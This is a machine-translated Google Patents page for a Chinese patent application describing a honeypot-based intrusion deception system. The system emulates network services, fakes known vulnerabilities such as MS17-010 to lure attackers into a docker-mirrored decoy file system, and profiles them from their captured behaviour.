CN115242466A - Intrusion active trapping system and method based on high-simulation virtual environment - Google Patents
Intrusion active trapping system and method based on high-simulation virtual environment Download PDFInfo
- Publication number
- CN115242466A CN115242466A CN202210776795.XA CN202210776795A CN115242466A CN 115242466 A CN115242466 A CN 115242466A CN 202210776795 A CN202210776795 A CN 202210776795A CN 115242466 A CN115242466 A CN 115242466A
- Authority
- CN
- China
- Prior art keywords
- network service
- attacker
- file system
- module
- simulated
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Pending
Links
- 238000004088 simulation Methods 0.000 title claims abstract description 36
- 238000000034 method Methods 0.000 title claims abstract description 24
- 230000006399 behavior Effects 0.000 claims description 66
- 238000005516 engineering process Methods 0.000 claims description 29
- 238000001926 trapping method Methods 0.000 claims description 6
- 238000010586 diagram Methods 0.000 description 9
- 230000007123 defense Effects 0.000 description 8
- 230000006870 function Effects 0.000 description 8
- 238000004590 computer program Methods 0.000 description 7
- 238000005242 forging Methods 0.000 description 6
- 230000003993 interaction Effects 0.000 description 5
- 230000004044 response Effects 0.000 description 5
- 230000008569 process Effects 0.000 description 4
- 238000003860 storage Methods 0.000 description 4
- 239000008186 active pharmaceutical agent Substances 0.000 description 3
- 230000007547 defect Effects 0.000 description 3
- 238000001514 detection method Methods 0.000 description 3
- ZXQYGBMAQZUVMI-GCMPRSNUSA-N gamma-cyhalothrin Chemical compound CC1(C)[C@@H](\C=C(/Cl)C(F)(F)F)[C@H]1C(=O)O[C@H](C#N)C1=CC=CC(OC=2C=CC=CC=2)=C1 ZXQYGBMAQZUVMI-GCMPRSNUSA-N 0.000 description 3
- 241000700605 Viruses Species 0.000 description 2
- 238000010276 construction Methods 0.000 description 2
- 230000000694 effects Effects 0.000 description 2
- 238000006467 substitution reaction Methods 0.000 description 2
- 241000283086 Equidae Species 0.000 description 1
- 230000009471 action Effects 0.000 description 1
- 230000036626 alertness Effects 0.000 description 1
- 230000009286 beneficial effect Effects 0.000 description 1
- 239000000470 constituent Substances 0.000 description 1
- 230000010485 coping Effects 0.000 description 1
- 230000002708 enhancing effect Effects 0.000 description 1
- 239000000284 extract Substances 0.000 description 1
- 238000001914 filtration Methods 0.000 description 1
- 238000002513 implantation Methods 0.000 description 1
- 230000006698 induction Effects 0.000 description 1
- 238000004519 manufacturing process Methods 0.000 description 1
- 238000012986 modification Methods 0.000 description 1
- 230000004048 modification Effects 0.000 description 1
- 230000003287 optical effect Effects 0.000 description 1
- 230000002085 persistent effect Effects 0.000 description 1
- 230000026676 system process Effects 0.000 description 1
Images
Classifications
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1441—Countermeasures against malicious traffic
- H04L63/1491—Countermeasures against malicious traffic using deception as countermeasure, e.g. honeypots, honeynets, decoys or entrapment
Landscapes
- Engineering & Computer Science (AREA)
- Computer Security & Cryptography (AREA)
- Computer Hardware Design (AREA)
- Computing Systems (AREA)
- General Engineering & Computer Science (AREA)
- Computer Networks & Wireless Communication (AREA)
- Signal Processing (AREA)
- Computer And Data Communications (AREA)
Abstract
The invention relates to an intrusion active trapping system and method based on a high-simulation virtual environment, wherein the system comprises the following components: the network service simulation module is used for simulating a real network service to obtain a simulated network service; the security vulnerability counterfeiting module is used for counterfeiting security vulnerabilities for the simulated network services so that attackers can enter the simulated network services according to the security vulnerabilities; the file system mirror image module is used for generating a file system in the simulated network service to obtain a virtual file system; the information deception module is used for generating false information in the virtual file system; the operation control module is used for collecting attack behavior data of an attacker and carrying out image shooting on the attacker according to the attack behavior data when the attacker enters the simulated network service and carries out attack behavior operation on the false information so as to trap the network intrusion behavior of the attacker by utilizing the image shooting. The invention can actively trap the attacker, block and isolate the attack of the attacker on the real network environment, and provide a safe and reliable network environment.
Description
Technical Field
The invention belongs to the technical field of information security, and particularly relates to an intrusion active trapping system and method based on a high-simulation virtual environment.
Background
Most of products of the existing mainstream traditional security protection system are deployed at the network boundary and perform pattern matching by means of known attack feature codes to detect the known network attacks, and the solution can effectively monitor the general known network attacks, such as: worms, trojan horses, spyware, botnet, and basic computer viruses, but have no success at all in addressing the Advanced Persistent Threat (APT) today.
The traditional security defense means is used for dealing with the medium-low level common network threats and the non-targeted network attacks, which proves that the traditional security defense means can play a certain role, but in the current new form, the traditional security defense means has defects in the aspects of facing some high-level network threats and targeted network attacks, and is difficult to effectively deal with:
(1) Due to the lack of effective intranet threat sensing means, a large amount of repeated security construction is limited to border defense, an unbreakable system is attempted to be built, and the security threat of an internal network is not paid attention to enough;
(2) The defense mode is too passive, the traditional network security system including APT products is usually deployed at the network side and is detected through the flow of the mirror image, but the detected threats are all generated, even if the response is detected at the first time, the network is not trusted in the period of time;
(3) The novel defense system is difficult to find and effectively deal with various novel high-level threats in time, the high-level threat attack concealment is very strong, the attack is usually carried out by utilizing a user-defined tool, unknown bugs and simulating normal operation, and the traditional defense means is difficult to find.
Disclosure of Invention
In view of the above, the present invention aims to overcome the defects of the prior art, and provide an intrusion active trapping system and method based on a high-emulation virtual environment, so as to solve the problems in the prior art that the defense mode is too passive, and it is difficult to timely discover and effectively deal with various new high-level threats.
According to a first aspect of embodiments of the present application, there is provided an intrusion active trapping system based on a highly-simulated virtual environment, the system including:
the network service simulation module is used for simulating real network service to obtain simulated network service;
the security vulnerability counterfeiting module is used for counterfeiting security vulnerabilities for the simulated network services so that attackers can enter the simulated network services according to the security vulnerabilities;
the file system mirror module is used for generating a file system in the simulated network service to obtain a virtual file system;
the information spoofing module is used for generating false information in the virtual file system;
and the operation control module is used for collecting attack behavior data of an attacker when the attacker enters the simulated network service and carries out attack behavior operation on the false information, and portrays the attacker according to the attack behavior data so as to utilize the portrayal to trap the network intrusion behavior of the attacker.
Preferably, the network service simulation module is specifically configured to:
simulating real network service by utilizing a honeypot technology to obtain the simulated network service;
and deploying the simulated network service in a real network environment by utilizing port forwarding and port proxy technology.
Preferably, the security vulnerability forging module is specifically configured to:
determining a security vulnerability corresponding to the simulated network service according to the simulated network service based on a preset security vulnerability library;
and deploying the security vulnerability corresponding to the simulated network service in the simulated network service by utilizing a vulnerability rule base.
Preferably, the file system mirroring module is specifically configured to:
and mirroring the real file system by using a docker technology to generate the file system in the simulated network service to obtain a virtual file system.
Preferably, the information spoofing module is specifically configured to:
and simulating content information in a real file system by using a docker technology to generate false information in the virtual file system.
Preferably, the operation control module is specifically configured to:
when an attacker enters the simulated network service and performs attack behavior operation on the false information, acquiring attack behavior data of the attacker;
extracting characteristic elements in the attack behavior data;
and according to the characteristic elements, utilizing a rule matching technology to portray the attacker so as to finish the active trapping of the attacker.
Preferably, the characteristic elements include: IP information, domain name information, intrusion tools, malicious file samples, intrusion instructions, and intrusion behavior.
According to a second aspect of the embodiments of the present application, there is provided an intrusion active trapping method based on a highly simulated virtual environment, which is applied to the above intrusion active trapping system based on a highly simulated virtual environment, the method includes:
simulating real network service by using a network service simulation module to obtain simulated network service;
utilizing a security vulnerability counterfeiting module to forge security vulnerabilities for the simulated network services so that attackers can enter the simulated network services according to the security vulnerabilities;
generating a file system in the simulated network service by using a file system mirror image module to obtain a virtual file system;
generating false information in the virtual file system by using an information spoofing module;
when an attacker enters the simulated network service and performs attack behavior operation on the false information, an operation control module is used for collecting attack behavior data of the attacker, and the attacker is portrayed according to the attack behavior data so as to utilize the portrayal to trap network intrusion behaviors of the attacker.
By adopting the technical scheme, the invention can achieve the following beneficial effects: simulating real network service through a network service simulation module to obtain simulated network service, and forging security loopholes for the simulated network service through a security loophole forging module so that an attacker enters the simulated network service according to the security loopholes to provide a necessary simulation scene for trapping the attacker, thereby protecting the real network environment of a user; the method comprises the steps that a file system in the simulated network service is generated through a file system mirror image module to obtain a virtual file system, false information in the virtual file system is generated through an information deception module, attack behavior data of an attacker are collected through an operation control module when the attacker enters the simulated network service and performs attack behavior operation on the false information, the attacker is portrayed according to the attack behavior data, network intrusion behaviors of the attacker are trapped by utilizing the portrayal, and therefore the attacker can be actively trapped, and attacks of the attacker on a real network environment are blocked and isolated; and the system can also portrait various types of attackers by interacting with the attackers for a long time, so that various novel high-grade threats are dealt with, a safe and reliable network environment is provided for users, and the experience degree of the users is improved.
Drawings
In order to more clearly illustrate the embodiments of the present invention or the technical solutions in the prior art, the drawings used in the description of the embodiments or the prior art will be briefly described below, it is obvious that the drawings in the following description are only some embodiments of the present invention, and for those skilled in the art, other drawings can be obtained according to the drawings without creative efforts.
FIG. 1 is a block diagram illustrating an intrusion active trap system based on a highly emulated virtual environment in accordance with an exemplary embodiment;
FIG. 2 is a flow diagram illustrating an intrusion active trapping method based on a highly emulated virtual environment, according to an exemplary embodiment;
in the figure, 1 is a network service simulation module, 2 is a security vulnerability falsification module, 3 is a file system mirror image module, 4 is an information deception module, and 5 is an operation control module.
Detailed Description
In order to make the objects, technical solutions and advantages of the present invention more apparent, the technical solutions of the present invention will be described in detail below. It is to be understood that the described embodiments are merely exemplary of the invention, and not restrictive of the full scope of the invention. All other embodiments, which can be derived by a person skilled in the art from the examples given herein without any inventive step, are within the scope of the present invention.
Example one
FIG. 1 is a block diagram illustrating an intrusion active trap system based on a highly emulated virtual environment, as shown in FIG. 1, in accordance with an illustrative embodiment, the system comprising:
the network service simulation module 1 is used for simulating real network service to obtain simulated network service;
the security vulnerability counterfeiting module 2 is used for counterfeiting security vulnerabilities for the simulated network services so that attackers can enter the simulated network services according to the security vulnerabilities;
the file system mirror module 3 is used for generating a file system in the simulated network service to obtain a virtual file system;
the information deception module 4 is used for generating false information in the virtual file system;
and the operation control module 5 is used for collecting attack behavior data of an attacker when the attacker enters the simulated network service and performs attack behavior operation on the false information, and portraying the attacker according to the attack behavior data so as to trap the network intrusion behavior of the attacker by using the portrayal.
It should be noted that the attacker is a network attacker, which is also called an intruder. The network attacker attacks the system and the resources by using the loopholes and security defects existing in the network information system.
According to the intrusion active trapping system based on the high-simulation virtual environment, the real network service is simulated through the network service simulation module 1 to obtain the simulated network service, the security loophole is forged for the simulated network service through the security loophole forging module 2, so that an attacker enters the simulated network service according to the security loophole to provide a necessary simulation scene for trapping the attacker, and the real network environment of a user is protected; the file system in the simulated network service is generated through the file system mirror image module 3 to obtain a virtual file system, the false information in the virtual file system is generated through the information deception module 4, the attack behavior data of an attacker is collected through the operation control module 5 when the attacker enters the simulated network service and performs attack behavior operation on the false information, the attacker is portrayed according to the attack behavior data to trap the network intrusion behavior of the attacker by utilizing the portrayal, and the attacker can be actively trapped to block and isolate the attack of the attacker on the real network environment; and the system can also portrait various types of attackers by interacting with the attackers for a long time, so that various novel high-grade threats are dealt with, a safe and reliable network environment is provided for users, and the experience degree of the users is improved.
Further, the network service simulation module 1 is specifically configured to:
simulating real network service by utilizing a honeypot technology to obtain simulated network service;
and deploying the simulated network service in a real network environment by utilizing port forwarding and port proxy technologies.
In some embodiments, the network service simulation module 1 mainly provides normal network service to the outside by simulating a real network service program, and simultaneously adds a new function in the simulation program, so as to implement further cheating and control on an intrusion behavior; for example, the common WWW, FTP and Telnet service programs are simulated; a certain Trojan horse program can be simulated to cause the false impression of implantation by the Trojan horse, and the target is a common network asset without safety construction from the perspective of an attacker;
the network service is an external window of a network and an information system and is a first step of implementing cheating; in the embodiment of the invention, by simulating a real network service program (such as Microsoft Intemet Information Server), all people can access the service through a client program (such as Microsoft Intemet Explorer), so that the method has the advantages that the program is completely controllable, the return Information is convenient to customize, the same function as the real service program is realized, the required log Information is recorded, the network intrusion detection of the service level is embedded, and the security vulnerability is further forged; furthermore, by providing true network services, further fraud and control measures are facilitated.
The network service simulation technique is expressed using BNF as follows:
Ss::=S St
wherein Ss denotes a simulated web service program and St denotes a real web service program.
<S>::=<FC><F><Log><II><IVF>
Wherein FC represents the implementation of the same function and instruction; f represents the customization of information such as flag version; log represents a Log, and lI represents an intrusion detection expansion interface; IVF represents a security vulnerability forged extension interface.
<Log>::=<LFL><RRL>
Wherein, LFL represents a local fake log; RRL represents a remote real log.
It can be understood that the simulated network service is deployed in a real network environment, so that a necessary simulation scene is provided for trapping attackers, the real network environment of a user is protected, the alertness of the attackers is reduced, and a foundation is laid for trapping the attackers.
It should be noted that, by simulating various types of real network services by using honeypot technology, simulated network services are obtained, each simulated network service may be referred to as a honeypot, an environment composed of a plurality of honeypots is referred to as a honeynet, and the honeynet is a highly simulated virtual environment. In the honeynet environment, diversified host computers and network structures are only basic constituent elements, and most importantly, a real service scene comprises a real host computer environment, a real service network, real service software, simulated service data and simulated service activities, which are completely real and false indistinguishable 'service scenes' for an attacker. The honeynet simulation function provides various necessary simulation scene resources for trapping and attacking people by means of comprehensive application of various virtualization technologies, including an operating system, an application system, network equipment and the like.
The corresponding services in the honeypots are opened, and the services are 'scattered' in the real network environment in a node mode. The attacker obtains the service in the real network through the detection behavior, and then the attacker attacks the service of the honeynet and leads to the security vulnerability falsification module 2. The honeypot is equivalent to a real host, and the services are equivalent to various types of services (for example, smb service) opened in the real host.
The honeypot technology, the port forwarding technology, and the port proxy technology, which are involved in the embodiments of the present invention, are well known to those skilled in the art, and therefore, the specific implementation manner thereof is not described too much.
Further, the security vulnerability falsification module 2 is specifically configured to:
determining a security vulnerability corresponding to the simulated network service according to the simulated network service based on a preset security vulnerability library;
and deploying the security vulnerability corresponding to the simulated network service in the simulated network service by utilizing the vulnerability rule base.
The embodiment of the invention does not limit the preset safety leak library, and can be set by technicians in the field according to expert experience or experimental data and the like. The "vulnerability rule base" mode related in the embodiment of the present invention is well known to those skilled in the art, and therefore, the specific implementation mode thereof is not described too much.
For example, if the simulated network service is the V1.0 version of the SMB service, a security vulnerability corresponding to the simulated network service is searched from a preset security vulnerability library, and finally, it is determined that the security vulnerability corresponding to the simulated network service is an MS17-010 vulnerability; deploying the MS17-010 vulnerability in the simulated network service by utilizing a vulnerability rule base; then an attacker may gain access to the emulated network service through an MS17-010 vulnerability. But if the emulated network service is the V2.0 version of the SMB service, the emulated network service cannot be accessed through an MS17-010 vulnerability. Here, the vulnerability refers to the "CVE vulnerability" that has been disclosed (the "MS17-010 vulnerability" mentioned above is a different name numbered "CVE-2017-0143 vulnerability").
It can be understood that the security vulnerability falsification module 2 further falsifies the security vulnerability in the simulated network service to arouse the interest of the attacker, so that the scanning, attacking and attacking results of the falsified security vulnerability of the attacker are completely consistent with the expression of the real vulnerability, and the attacker is deceived to obtain the highest authority of the network asset, thereby further realizing the interaction with the attacker.
It should be noted that a security hole is a prerequisite for a network attack. Security breach forgery is the second step of fraud, which depends on spoofing of network scanners and attack tools. Cheating a network scanner to ensure that an attacker believes that security holes exist in a network and an information system; spoofing the attack tool lets the attacker believe that he has successfully attacked a security breach into the host or network.
The embodiment of the invention realizes the whole process deception of vulnerability attack by forging the security vulnerability. The method can simulate the whole process of attacking the vulnerability, so that the performance information of the vulnerability is not different from the real vulnerability, and meanwhile, the intrusion behavior can be well controlled and redirected to the deception environment. The safety is ensured while the interaction degree and the deception are greatly improved.
In some embodiments, the network scanner obtains the security vulnerabilities in a request/reply manner based on feature matching techniques. According to the request information of the network scanner, response information of the existence of the loophole is returned to the network scanner, and the purpose of cheating can be achieved. Because the scanning information of different network scanners and the characteristic information of judging the existence of a vulnerability may be different, different response information needs to be customized according to different network scanners. And establishing a network scanner deception database, and maintaining the scanning characteristics and response characteristic information of different network scanners aiming at different security vulnerabilities.
The security vulnerability falsification technique is expressed using BNF as follows:
Vf::=FVt
where Vf represents a fake security hole and Vt represents a real security hole.
<F>::=<DS><DA><DR>
Wherein DS represents a spoof scanner; DA represents a spoofing attack tool; DR represents spoofing of attack results.
<DS>::=<RSI><VSL>
Wherein RSI represents scanner request information interception; the VSL represents a vulnerability signature table.
<VSL>::=<RSSL><ASSL>
Wherein RSSL represents a scanner request message characteristic table, ASSL represents a server response message characteristic table.
<DA>::=<AII><ASL>
Wherein, AII represents attack information interception; ASL denotes an attack signature table.
<ASL>::=<ASL><RIAL>
Wherein ASL represents an attack characteristic table, and RIAL represents an attack result information table.
<RIAL>::=<SIA><FIA>
Wherein SIA represents attack success information, and FIA represents attack failure information.
<DR>::=<GP><DOS>
Wherein GP represents acquisition right; DOS denotes denial of service.
Further, the file system mirroring module 3 is specifically configured to:
and mirroring the real file system by using a docker technology to generate a file system in the simulated network service to obtain a virtual file system.
In some embodiments, a docker technology is used to store file frames of different systems in a docker server, and when an attacker attacks different systems, the file system frames of the corresponding systems are extracted from a docker library for induction.
It can be understood that the file system is the final target of many attacks, and when an attacker breaks through the rogue host, some file operations, such as file adding, deleting, modifying and checking, are performed. To protect the host's file system from corruption by attackers, while not preventing attackers from file access operations, file system level spoofing must be implemented. In the embodiment of the invention, the virtual file system obtained by mirroring the real file system by the file system mirroring module 3 by using one directory of the real host file system has the same directory structure, system files, library files and the like as the real file system, so that an attacker can see the illusion of the whole file system.
The file system mirroring technique is represented using BNF as follows:
FSm::=M FSt
where FSm denotes the mirrored file system and FSt denotes the real file system.
<M>::=<BtoBC>
Where BtoBC represents a byte-to-byte copy.
It should be noted that the "mirror real file system using docker technology" manner referred to in the embodiments of the present invention is well known to those skilled in the art, and therefore, a specific implementation manner thereof is not described too much.
Further, the information spoofing module 4 is specifically configured to:
and simulating content information in a real file system by using a docker technology to generate false information in the virtual file system.
It will be appreciated that the message spoofing module 4 provides spoofing messages that are deceptive, making it appear to an attacker to be an important server, depending on the specific application requirements and the spoofed object. Moreover, as the simulated network service is real, the deception information can be flexibly customized aiming at different types of network services, and the updating is very convenient, so that an attacker can be deceived thoroughly.
The spoofing technique is expressed using BNF as follows:
ld::=D It
where ld represents fraudulent information and It represents true information.
<D>::=<SI><NC><IC>
Wherein, SI represents the simulation network service interface, NC represents the network and server attribute, and IC represents the information compilation.
It should be noted that, the manner of "simulating content information in a real file system by using docker technology" in the embodiment of the present invention is well known to those skilled in the art, and therefore, a specific implementation manner thereof is not described in detail.
Further, the operation control module 5 is specifically configured to:
when an attacker enters the simulated network service and performs attack behavior operation on the false information, acquiring attack behavior data of the attacker;
extracting characteristic elements in the attack behavior data;
according to the characteristic elements, an attacker is portrayed by utilizing a rule matching technology so as to finish active trapping of the attacker;
wherein, the characteristic element includes: IP information, domain name information, intrusion tools, malicious file samples, intrusion instructions, and intrusion behavior.
In some embodiments, viruses, trojans, worms, and the like are present within the sample of malicious files.
In some other alternative embodiments, the operation control module 5 extracts the IP information, domain name information, intrusion tools, malicious file samples, intrusion instructions, and characteristic elements of intrusion behavior from the collected attack behavior data, and performs comprehensive research and judgment through a built-in "attacker fingerprint" library and a threat information library.
Specifically, the attacker can be, but is not limited to, profiled by using the Rete algorithm in the rule matching technique. It should be noted that the "rule matching technology" manner involved in the embodiments of the present invention is well known to those skilled in the art, and therefore, the specific implementation manner thereof is not described too much.
In some embodiments, the operation control module 5 collects attack behavior data of an attacker by making necessary modifications to the operating system kernel or intercepting system calls to monitor and control intrusion behavior. And the system for simulating the attack and subsidence of the attacked person effectively monitors the operation behavior of the attacker by recording, reading and returning the data packet of the attacker passing through the honeypot system, and is displayed at the front end in a unique encryption mode of the honeynet. This is a precondition for establishing a medium-high interaction spoofing environment, otherwise, only a low-interaction spoofing environment of a shallow level is available. The kernel level control enables the operation of an attacker to be limited to the operation of a specific object in a specific logical environment, thereby improving security.
It will be appreciated that when an attacker enters a spoofed environment through emulated web services and counterfeit security breaches, they may do some action such as modifying the log or installing a back door program. It must be ensured that attackers are allowed to do some operations (e.g., copy or delete files or file contents) while their operational activities cannot compromise the real host or network security, thereby enhancing the spoofing system authenticity. Through carrying out long-time interaction with the attacker, portraying various types of attackers, coping with various novel high-grade threats, providing a safe and reliable network environment for users, and improving the experience of the users.
The operating system kernel interacts directly with the hardware, and the act of interacting with the kernel occurs in the user space (e.g., the user initiates a process or instruction execution). Almost all applications (e.g., WWW, DNS, and FRP) operate in user space. Therefore, interception of kernel interaction behaviors by instructions or applications is realized in a user space, and intrusion behaviors can be well controlled.
The operational control is expressed using BNF as follows:
OPc::=C Opt,
where, OPc represents the controlled operation and OPt represents the real operation.
<C>::=<SCI>|<SCR>
Wherein SCI represents system call interception and SCR represents system call replacement.
<SCI>::=<CG><OPI>
Wherein, CG represents instruction information acquisition, and OPI represents operation interception.
<OPI>::=<OPR><OPF><Alert><Log>
Wherein, OPR represents operation redirection, OPF represents operation filtering, alert represents alarm, and Log represents Log.
<Log>::=<LFL><RRL>
Wherein, LFL represents a local forgery log; RRL represents a remote real log.
<SCR>::=<CG><SIH><SPH><Alert><Log>
The CG represents instruction information acquisition, the SIH represents sensitive information hiding, the SPH represents system process hiding, the Alert represents an alarm, and the Log represents a Log.
<SIH>::=<lfS><ItH>
Wherein IfS indicates counterfeit information display, and ItH indicates real information hiding.
<Log>::=<LFL><RRL>
Wherein, LFL represents a local fake log; RRL represents a remote real log.
According to the intrusion active trapping system based on the high-simulation virtual environment, the real network service is simulated through the network service simulation module 1 to obtain the simulated network service, the security loophole is forged for the simulated network service through the security loophole forging module 2, so that an attacker enters the simulated network service according to the security loophole to provide a necessary simulation scene for trapping the attacker, and the real network environment of a user is protected; the file system in the simulated network service is generated through the file system mirror image module 3 to obtain a virtual file system, the false information in the virtual file system is generated through the information deception module 4, the attack behavior data of an attacker is collected through the operation control module 5 when the attacker enters the simulated network service and performs attack behavior operation on the false information, the attacker is portrayed according to the attack behavior data to trap the network intrusion behavior of the attacker by utilizing the portrayal, and the attacker can be actively trapped to block and isolate the attack of the attacker on the real network environment; and the system can also portrait various types of attackers by interacting with the attackers for a long time, so that various novel high-grade threats are dealt with, a safe and reliable network environment is provided for users, and the experience degree of the users is improved.
Example two
In order to implement the above intrusion active trapping system based on the high-simulation virtual environment cooperatively, an embodiment of the present invention provides an intrusion active trapping method based on the high-simulation virtual environment, which is applied to the above intrusion active trapping system based on the high-simulation virtual environment, and the method can be used for a terminal, but is not limited to the terminal, and includes the following steps:
step 101: simulating real network service by using a network service simulation module to obtain simulated network service;
step 102: utilizing a security vulnerability counterfeiting module to forge security vulnerabilities for the simulated network services so that attackers can enter the simulated network services according to the security vulnerabilities;
step 103: generating a file system in the simulated network service by using a file system mirror image module to obtain a virtual file system;
step 104: generating false information in the virtual file system by using an information spoofing module;
step 105: when an attacker enters the simulated network service and performs attack behavior operation on the false information, the operation control module is used for collecting attack behavior data of the attacker, and the attacker is portrayed according to the attack behavior data so as to trap the network intrusion behavior of the attacker by using the portrayal.
Further, step 101 includes:
simulating real network service by using a honeypot technology to obtain simulated network service;
and deploying the simulated network service in a real network environment by utilizing port forwarding and port proxy technologies.
Further, step 102 includes:
determining a security vulnerability corresponding to the simulated network service according to the simulated network service based on a preset security vulnerability library;
and deploying the security vulnerability corresponding to the simulated network service in the simulated network service by utilizing the vulnerability rule base.
Further, step 103 includes:
and mirroring the real file system by using a docker technology to generate a file system in the simulated network service to obtain a virtual file system.
Further, step 104 includes:
and simulating content information in a real file system by using a docker technology to generate false information in the virtual file system.
Further, step 105 includes:
step 1051: when an attacker enters the simulated network service and performs attack behavior operation on the false information, acquiring attack behavior data of the attacker;
step 1052: extracting characteristic elements in the attack behavior data;
step 1053: and (4) according to the characteristic elements, utilizing a rule matching technology to portray the attacker so as to finish the active trapping of the attacker.
Specifically, the characteristic elements include: IP information, domain name information, intrusion tools, malicious file samples, intrusion instructions, and intrusion behavior.
According to the intrusion active trapping method based on the high-simulation virtual environment, the network service simulation module is utilized to simulate real network service to obtain simulated network service, the security vulnerability counterfeiting module is utilized to forge security vulnerabilities for the simulated network service, so that an attacker enters the simulated network service according to the security vulnerabilities to provide a necessary simulation scene for trapping the attacker, and the real network environment of a user is protected; the file system in the simulated network service is generated by utilizing the file system mirror image module to obtain a virtual file system, the false information in the virtual file system is generated by utilizing the information deception module, when an attacker enters the simulated network service and performs attack behavior operation on the false information, the attack behavior data of the attacker is collected by utilizing the operation control module, the attacker is portrayed according to the attack behavior data, so that the network intrusion behavior of the attacker is trapped by utilizing the portrayal, the attacker can be actively trapped, and the attack of the attacker on the real network environment is blocked and isolated; and the system can also portrait various types of attackers by interacting with the attackers for a long time, so that various novel high-grade threats are dealt with, a safe and reliable network environment is provided for users, and the experience degree of the users is improved.
It is to be understood that the system embodiments provided above correspond to the method embodiments described above, and corresponding specific contents may be referred to each other, which are not described herein again.
EXAMPLE III
The embodiment of the present invention further provides a readable storage medium, on which an executable program is stored, and when the executable program is executed by a processor, the steps in the intrusion active trapping method based on the highly-simulated virtual environment provided by the above embodiment are implemented.
It is understood that the same or similar parts in the above embodiments may be mutually referred to, and the same or similar parts in other embodiments may be referred to for the content which is not described in detail in some embodiments.
As will be appreciated by one skilled in the art, embodiments of the present application may be provided as a method, system, or computer program product. Accordingly, the present application may take the form of an entirely hardware embodiment, an entirely software embodiment or an embodiment combining software and hardware aspects. Furthermore, the present application may take the form of a computer program product embodied on one or more computer-usable storage media (including, but not limited to, disk storage, optical storage, and the like) having computer-usable program code embodied therein.
The present application is described with reference to flowchart illustrations and/or block diagrams of methods, apparatus (systems), and computer program products according to embodiments of the application. It will be understood that each flow and/or block of the flowchart illustrations and/or block diagrams, and combinations of flows and/or blocks in the flowchart illustrations and/or block diagrams, can be implemented by computer program instructions. These computer program instructions may be provided to a processor of a general purpose computer, special purpose computer, embedded processor, or other programmable data processing apparatus to produce a machine, such that the instructions, which execute via the processor of the computer or other programmable data processing apparatus, create means for implementing the functions specified in the flowchart flow or flows and/or block diagram block or blocks.
These computer program instructions may also be stored in a computer-readable memory that can direct a computer or other programmable data processing apparatus to function in a particular manner, such that the instructions stored in the computer-readable memory produce an article of manufacture including instruction means which implement the function specified in the flowchart flow or flows and/or block diagram block or blocks.
These computer program instructions may also be loaded onto a computer or other programmable data processing apparatus to cause a series of operational steps to be performed on the computer or other programmable apparatus to produce a computer implemented process such that the instructions which execute on the computer or other programmable apparatus provide steps for implementing the functions specified in the flowchart flow or flows and/or block diagram block or blocks.
The above description is only for the specific embodiments of the present invention, but the scope of the present invention is not limited thereto, and any person skilled in the art can easily conceive of the changes or substitutions within the technical scope of the present invention, and all the changes or substitutions should be covered within the scope of the present invention. Therefore, the protection scope of the present invention shall be subject to the protection scope of the appended claims.
Claims (8)
1. An intrusion active trapping system based on a highly simulated virtual environment, the system comprising:
the network service simulation module is used for simulating real network service to obtain simulated network service;
the security vulnerability counterfeiting module is used for counterfeiting security vulnerabilities for the simulated network services so that attackers can enter the simulated network services according to the security vulnerabilities;
the file system mirror module is used for generating a file system in the simulated network service to obtain a virtual file system;
the information deception module is used for generating false information in the virtual file system;
and the operation control module is used for collecting attack behavior data of an attacker when the attacker enters the simulated network service and carries out attack behavior operation on the false information, and portrays the attacker according to the attack behavior data so as to utilize the portrayal to trap the network intrusion behavior of the attacker.
2. The system of claim 1, wherein the web service emulation module is specifically configured to:
simulating real network service by utilizing a honeypot technology to obtain the simulated network service;
and deploying the simulated network service in a real network environment by utilizing port forwarding and port proxy technology.
3. The system according to claim 1, wherein the security breach falsification module is specifically configured to:
determining a security vulnerability corresponding to the simulated network service according to the simulated network service based on a preset security vulnerability library;
and deploying the security vulnerability corresponding to the simulated network service in the simulated network service by utilizing a vulnerability rule base.
4. The system of claim 1, wherein the file system mirroring module is specifically configured to:
and mirroring the real file system by using a docker technology to generate the file system in the simulated network service to obtain a virtual file system.
5. The system of claim 1, wherein the information spoofing module is specifically configured to:
and simulating content information in a real file system by using a docker technology to generate false information in the virtual file system.
6. The system of claim 1, wherein the operation control module is specifically configured to:
when an attacker enters the simulated network service and performs attack behavior operation on the false information, acquiring attack behavior data of the attacker;
extracting characteristic elements in the attack behavior data;
and according to the characteristic elements, utilizing a rule matching technology to portray the attacker so as to finish the active trapping of the attacker.
7. The system of claim 6, wherein the feature element comprises: IP information, domain name information, intrusion tools, malicious file samples, intrusion instructions, and intrusion behavior.
8. An intrusion active trapping method based on a high simulation virtual environment, which is applied to the intrusion active trapping system based on the high simulation virtual environment of any one of claims 1 to 7, wherein the method comprises the following steps:
simulating real network service by using a network service simulation module to obtain simulated network service;
utilizing a security vulnerability counterfeiting module to forge security vulnerabilities for the simulated network services so that attackers can enter the simulated network services according to the security vulnerabilities;
generating a file system in the simulated network service by using a file system mirror image module to obtain a virtual file system;
generating false information in the virtual file system by using an information spoofing module;
when an attacker enters the simulated network service and performs attack behavior operation on the false information, an operation control module is used for collecting attack behavior data of the attacker, and the attacker is portrayed according to the attack behavior data so as to utilize the portrayal to trap network intrusion behaviors of the attacker.
Priority Applications (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN202210776795.XA CN115242466A (en) | 2022-07-04 | 2022-07-04 | Intrusion active trapping system and method based on high-simulation virtual environment |
Applications Claiming Priority (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN202210776795.XA CN115242466A (en) | 2022-07-04 | 2022-07-04 | Intrusion active trapping system and method based on high-simulation virtual environment |
Publications (1)
| Publication Number | Publication Date |
|---|---|
| CN115242466A true CN115242466A (en) | 2022-10-25 |
Family
ID=83671264
Family Applications (1)
| Application Number | Title | Priority Date | Filing Date |
|---|---|---|---|
| CN202210776795.XA Pending CN115242466A (en) | 2022-07-04 | 2022-07-04 | Intrusion active trapping system and method based on high-simulation virtual environment |
Country Status (1)
| Country | Link |
|---|---|
| CN (1) | CN115242466A (en) |
Cited By (2)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN115632882A (en) * | 2022-12-15 | 2023-01-20 | 北京市大数据中心 | Illegal network attack detection method, computer device and medium |
